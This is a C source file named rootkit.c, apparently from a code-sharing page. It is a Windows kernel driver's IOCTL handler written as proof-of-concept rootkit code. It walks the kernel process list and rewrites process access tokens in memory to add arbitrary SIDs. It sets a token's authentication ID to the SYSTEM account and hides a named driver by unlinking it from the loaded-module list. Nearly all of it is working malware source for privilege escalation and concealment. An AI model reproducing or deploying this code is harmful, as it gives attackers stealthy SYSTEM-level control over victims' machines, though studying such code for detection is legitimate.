📄 rootkit.c
字号:
for (i_LuidsUsed = 0; i_LuidsUsed < nluids; i_LuidsUsed++)
{
if (luids_attr[i_LuidsUsed].Attributes != 0xffffffff)
{
for (luid_attr_count = 0; luid_attr_count < i_PrivCount; luid_attr_count++)
{
// If the privilege was disabled anyway, it was not necessary and we are going to reuse this space for our
// new privileges we want to add. Not all the privileges we request may get added because of space so you
// should order the new privileges in decreasing order.
if((luids_attr[i_LuidsUsed].Attributes != 0xffffffff) && (luids_attr_orig[luid_attr_count].Attributes == 0x00000000))
{
luids_attr_orig[luid_attr_count].Luid = luids_attr[i_LuidsUsed].Luid;
luids_attr_orig[luid_attr_count].Attributes = luids_attr[i_LuidsUsed].Attributes;
luids_attr[i_LuidsUsed].Attributes = 0xffffffff; // Canary value we will use
}
}
}
}
break;
case IOCTL_ROOTKIT_SETSID:
if ((InputBufferLength < sizeof(struct _vars2)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
////////////////////////////////////////////////////////////////////////////////////////
// Some of these are pointers so what they point to may not be paged in, but I don't care. It is
// proof of concept code for a reason.
find_PID = ((VARS2 *)InputBuffer)->the_PID;
psid = ((VARS2 *)InputBuffer)->pSID;
i_SidSize = ((VARS2 *)InputBuffer)->i_SidSize;
if ((find_PID == 0x00000000) || (psid == NULL) || (i_SidSize == 0))
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
eproc = FindProcessEPROC(find_PID);
if (eproc == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
token = FindProcessToken(eproc);
i_PrivCount = *(int *)(token + PRIVCOUNTOFFSET);
i_SidCount = *(int *)(token + SIDCOUNTOFFSET);
luids_attr_orig = *(PLUID_AND_ATTRIBUTES *)(token + PRIVADDROFFSET);
varbegin = (PVOID) luids_attr_orig;
i_VariableLen = *(int *)(token + PRIVCOUNTOFFSET + 4);
sid_ptr_old = *(PSID_AND_ATTRIBUTES *)(token + SIDADDROFFSET);
// This is going to be our temporary workspace
varpart = ExAllocatePool(PagedPool, i_VariableLen);
if (varpart == NULL)
{
IoStatus->Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
RtlZeroMemory(varpart, i_VariableLen);
// Copy only the Privileges enabled. We will overwrite the disabled privileges to make room for the new SID
for (luid_attr_count = 0; luid_attr_count < i_PrivCount; luid_attr_count++)
{
if(((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Attributes != SE_PRIVILEGE_DISABLED)
{
((PLUID_AND_ATTRIBUTES)varpart)[i_LuidsUsed].Luid = ((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Luid;
((PLUID_AND_ATTRIBUTES)varpart)[i_LuidsUsed].Attributes = ((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Attributes;
i_LuidsUsed++;
}
}
// Calculate the space that we need within the existing token
i_spaceNeeded = i_SidSize + sizeof(SID_AND_ATTRIBUTES);
i_spaceSaved = (i_PrivCount - i_LuidsUsed) * sizeof(LUID_AND_ATTRIBUTES);
i_spaceUsed = i_LuidsUsed * sizeof(LUID_AND_ATTRIBUTES);
// There is not enough room for the new SID. Note: I am ignoring the Restricted SID's. They may also
// be a part of the variable length part.
if (i_spaceSaved < i_spaceNeeded)
{
ExFreePool(varpart);
IoStatus->Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
RtlCopyMemory((PVOID)((DWORD)varpart+i_spaceUsed), (PVOID)((DWORD)varbegin + (i_PrivCount * sizeof(LUID_AND_ATTRIBUTES))), i_SidCount * sizeof(SID_AND_ATTRIBUTES));
for (sid_count = 0; sid_count < i_SidCount; sid_count++)
{
//((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count].Sid = (PSID)((DWORD) sid_ptr_old[sid_count].Sid - ((i_PrivCount * sizeof(LUID_AND_ATTRIBUTES)) - (i_LuidsUsed * sizeof(LUID_AND_ATTRIBUTES))) + sizeof(SID_AND_ATTRIBUTES));
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count].Sid = (PSID)(((DWORD) sid_ptr_old[sid_count].Sid) - ((DWORD) i_spaceSaved) + ((DWORD)sizeof(SID_AND_ATTRIBUTES)));
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count].Attributes = sid_ptr_old[sid_count].Attributes;
}
// Setup the new SID_AND_ATTRIBUTES properly.
SizeOfLastSid = (DWORD)varbegin + i_VariableLen;
SizeOfLastSid = SizeOfLastSid - (DWORD)((PSID_AND_ATTRIBUTES)sid_ptr_old)[i_SidCount-1].Sid;
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[i_SidCount].Sid = (PSID)((DWORD)((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[i_SidCount-1].Sid + SizeOfLastSid);
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[i_SidCount].Attributes = 0x00000007;
// Copy the old SID's, but make room for the new SID_AND_ATTRIBUTES
SizeOfOldSids = (DWORD)varbegin + i_VariableLen;
SizeOfOldSids = SizeOfOldSids - (DWORD)((PSID_AND_ATTRIBUTES)sid_ptr_old)[0].Sid;
RtlCopyMemory((VOID UNALIGNED *)((DWORD)varpart + (i_spaceUsed)+((i_SidCount+1)*sizeof(SID_AND_ATTRIBUTES))), (CONST VOID UNALIGNED *)((DWORD)varbegin+(i_PrivCount*sizeof(LUID_AND_ATTRIBUTES))+(i_SidCount*sizeof(SID_AND_ATTRIBUTES))), SizeOfOldSids);
// Copy the new stuff right over the old data
RtlZeroMemory(varbegin, i_VariableLen);
RtlCopyMemory(varbegin, varpart, i_VariableLen);
// Copy the new SID at the end of the old SID's.
RtlCopyMemory(((PSID_AND_ATTRIBUTES)((DWORD)varbegin+(i_spaceUsed)))[i_SidCount].Sid, psid, i_SidSize);
// Fix the token back up.
*(int *)(token + SIDCOUNTOFFSET) += 1;
*(int *)(token + PRIVCOUNTOFFSET) = i_LuidsUsed;
*(PSID_AND_ATTRIBUTES *)(token + SIDADDROFFSET) = (PSID_AND_ATTRIBUTES)((DWORD) varbegin + (i_spaceUsed));
ExFreePool(varpart);
break;
case IOCTL_ROOTKIT_SETAUTHID:
if ((InputBufferLength < sizeof(struct _vars2)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
////////////////////////////////////////////////////////////////////////////////////////
// Some of these are pointers so what they point to may not be paged in, but I don't care. It is
// proof of concept code for a reason.
find_PID = ((VARS2 *)InputBuffer)->the_PID;
psid = ((VARS2 *)InputBuffer)->pSID;
i_SidSize = ((VARS2 *)InputBuffer)->i_SidSize;
if ((find_PID == 0x00000000) || (psid == NULL) || (i_SidSize == 0))
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
eproc = FindProcessEPROC(find_PID);
if (eproc == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
token = FindProcessToken(eproc);
i_PrivCount = *(int *)(token + PRIVCOUNTOFFSET);
i_SidCount = *(int *)(token + SIDCOUNTOFFSET);
luids_attr_orig = *(PLUID_AND_ATTRIBUTES *)(token + PRIVADDROFFSET);
varbegin = (PVOID) luids_attr_orig;
i_VariableLen = *(int *)(token + PRIVCOUNTOFFSET + 4);
sid_ptr_old = *(PSID_AND_ATTRIBUTES *)(token + SIDADDROFFSET);
// This is going to be our temporary workspace
varpart = ExAllocatePool(PagedPool, i_VariableLen);
if (varpart == NULL)
{
IoStatus->Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
RtlZeroMemory(varpart, i_VariableLen);
// Copy only the Privileges enabled. We will overwrite the disabled privileges to make room for the new SID
for (luid_attr_count = 0; luid_attr_count < i_PrivCount; luid_attr_count++)
{
if(((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Attributes != SE_PRIVILEGE_DISABLED)
{
((PLUID_AND_ATTRIBUTES)varpart)[i_LuidsUsed].Luid = ((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Luid;
((PLUID_AND_ATTRIBUTES)varpart)[i_LuidsUsed].Attributes = ((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Attributes;
i_LuidsUsed++;
}
}
// Calculate the space that we need within the existing token
i_spaceNeeded = i_SidSize + sizeof(SID_AND_ATTRIBUTES);
i_spaceSaved = (i_PrivCount - i_LuidsUsed) * sizeof(LUID_AND_ATTRIBUTES);
i_spaceUsed = i_LuidsUsed * sizeof(LUID_AND_ATTRIBUTES);
// There is not enough room for the new SID. Note: I am ignoring the Restricted SID's. They may also
// be a part of the variable length part.
if (i_spaceSaved < i_spaceNeeded)
{
ExFreePool(varpart);
IoStatus->Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[0].Sid = (PSID) ((DWORD) varbegin + (i_spaceUsed) + ((i_SidCount+1) * sizeof(SID_AND_ATTRIBUTES)));
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[0].Attributes = 0x00000000;
d_SidStart = ((DWORD) varbegin + (i_spaceUsed) + ((i_SidCount+1) * sizeof(SID_AND_ATTRIBUTES)));
for (sid_count = 0; sid_count < i_SidCount; sid_count++)
{
if (sid_count == 0)
{
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count+1].Sid = (PSID) (d_SidStart + i_SidSize);
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count+1].Attributes = 0x00000007;
}
else {
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count+1].Sid = (PSID) ((DWORD)sid_ptr_old[sid_count].Sid - (DWORD)sid_ptr_old[sid_count-1].Sid + (DWORD)((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count].Sid);
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count+1].Attributes = sid_ptr_old[sid_count].Attributes;
}
}
// Copy the new SID.
RtlCopyMemory((PVOID) ((DWORD)varpart+(i_spaceUsed) + ((i_SidCount+1) * sizeof(SID_AND_ATTRIBUTES))), psid, i_SidSize);
// Copy the old SID's, but make room for the new SID_AND_ATTRIBUTES
SizeOfOldSids = (DWORD)varbegin + i_VariableLen;
SizeOfOldSids = SizeOfOldSids - (DWORD)((PSID_AND_ATTRIBUTES)sid_ptr_old)[0].Sid;
DbgPrint("The SizeOfOldSids = %x\n",SizeOfOldSids);
RtlCopyMemory((VOID UNALIGNED *)((DWORD)varpart + (i_spaceUsed)+(i_SidCount*sizeof(SID_AND_ATTRIBUTES))+i_spaceNeeded), (CONST VOID UNALIGNED *)((DWORD)varbegin+(i_PrivCount*sizeof(LUID_AND_ATTRIBUTES))+(i_SidCount*sizeof(SID_AND_ATTRIBUTES))), SizeOfOldSids);
// Copy the new stuff right over the old data
RtlZeroMemory(varbegin, i_VariableLen);
RtlCopyMemory(varbegin, varpart, i_VariableLen);
// Fix the token back up.
*(int *)(token + SIDCOUNTOFFSET) += 1;
*(int *)(token + PRIVCOUNTOFFSET) = i_LuidsUsed;
*(PSID_AND_ATTRIBUTES *)(token + SIDADDROFFSET) = (PSID_AND_ATTRIBUTES)((DWORD) varbegin + (i_spaceUsed));
// Set the AUTH_ID in the token to the LUID for the System account.
*(int *)(token + AUTHIDOFFSET) = SYSTEM_LUID;
ExFreePool(varpart);
break;
// This only prints the driver names to the debugger such as Debug View from SysInternals
case IOCTL_ROOTKIT_LISTDRIV:
if (MyPsModuleList == NULL)
{
IoStatus->Status = STATUS_UNSUCCESSFUL;
break;
}
m_current = *((MODULE_ENTRY*)MyPsModuleList->le_mod.Flink);
while (m_current.le_mod.Flink != MyPsModuleList->le_mod.Flink)
{
ntStatus = RtlUnicodeStringToAnsiString(&ansi_DriverName,
&(m_current.driver_Name),
TRUE);
if(NT_SUCCESS(ntStatus)) {
DbgPrint("Driver: %s\n", ansi_DriverName.Buffer);
RtlFreeAnsiString(&ansi_DriverName);
}
m_current = *((MODULE_ENTRY*)m_current.le_mod.Flink);
}
break;
case IOCTL_ROOTKIT_HIDEDRIV:
// Do some verification on the input buffer.
if ((InputBufferLength < sizeof(char)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
if (MyPsModuleList == NULL)
{
IoStatus->Status = STATUS_UNSUCCESSFUL;
break;
}
hide_DriverName.Length = (USHORT) InputBufferLength;
hide_DriverName.MaximumLength = (USHORT) InputBufferLength;
hide_DriverName.Buffer = (PCHAR)InputBuffer;
ntStatus = RtlAnsiStringToUnicodeString(&uni_hide_DriverName, &hide_DriverName, TRUE);
if(!NT_SUCCESS(ntStatus)) {
IoStatus->Status = STATUS_UNSUCCESSFUL;
break;
}
m_current = *((MODULE_ENTRY*)MyPsModuleList->le_mod.Flink);
while (m_current.le_mod.Flink != MyPsModuleList->le_mod.Flink)
{
if (RtlCompareUnicodeString(&uni_hide_DriverName, &(m_current.driver_Name), FALSE) == 0)
{
*((PDWORD)m_current.le_mod.Blink) = (DWORD) m_current.le_mod.Flink;
m_current.le_mod.Flink->Blink = m_current.le_mod.Blink;
//DbgPrint("Just hid %s\n",hide_DriverName.Buffer);
break;
}
else
m_current = *((MODULE_ENTRY*)m_current.le_mod.Flink);
}
if( NT_SUCCESS(ntStatus)) {
RtlFreeUnicodeString(&uni_hide_DriverName);
}
break;
default:
IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
break;
}
return IoStatus->Status;
}
DWORD FindProcessToken (DWORD eproc)
{
DWORD token;
__asm {
mov eax, eproc;
add eax, TOKENOFFSET;
mov eax, [eax];
and eax, 0xfffffff8; // Added for XP. See definition of _EX_FAST_REF
mov token, eax;
}
return token;
}
//////////////////////////////////////////////////////////////////////////////
// This function was originally written mostly in assembly language. Now let's
// make it readable to the masses.
DWORD FindProcessEPROC (int terminate_PID)
{
DWORD eproc = 0x00000000;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;
PLIST_ENTRY plist_active_procs;
if (terminate_PID == 0)
return terminate_PID;
eproc = (DWORD) PsGetCurrentProcess();
start_PID = *((DWORD*)(eproc+PIDOFFSET));
current_PID = start_PID;
while(1)
{
if(terminate_PID == current_PID)
return eproc;
else if((i_count >= 1) && (start_PID == current_PID))
{
return 0x00000000;
}
else {
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
eproc = (DWORD) plist_active_procs->Flink;
eproc = eproc - FLINKOFFSET;
current_PID = *((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -